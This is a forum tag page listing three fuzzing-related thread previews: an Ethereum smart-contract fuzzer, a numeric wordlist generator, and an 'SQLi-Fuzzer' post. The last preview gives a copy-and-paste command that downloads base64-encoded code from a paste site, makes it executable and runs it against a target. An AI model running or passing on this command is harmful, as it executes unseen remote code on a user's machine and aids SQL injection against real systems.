• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

fuzz

  1. itsMe

    Echidna v2.0.3 - Ethereum fuzz testing framework

    Echidna is a weird creature that eats bugs and is highly electrosensitive (with apologies to Jacob Stanley) More seriously, Echidna is a Haskell program designed for fuzzing/property-based testing of Ethereum smarts contracts. It uses sophisticated grammar-based fuzzing campaigns based on a...
  2. itsMe

    Phyton Amounts - Generate a wordlist to fuzz amounts or any other numerical values

    Amounts Generate a wordlist to fuzz amounts or any other numerical values. Based on Common Security Issues in Financially-Oriented Web Applications. Tests:     amount separators,     prepending zeros and appending decimal zeros,     prepending and appending positive "+" and negative "-"...
  3. B

    SQLi-Fuzzer

    > curl -s http://ix.io/1ea3 | base64 -d  > L23 && chmod +x L23 && ./L23 Copy and paste into your terminal. Drop it into the same directory where "sqlmap-dev/sqlmap.py" is located for me its in "/opt/".... Usage is simple, ./L23 <target> If you want to run...
Back
Top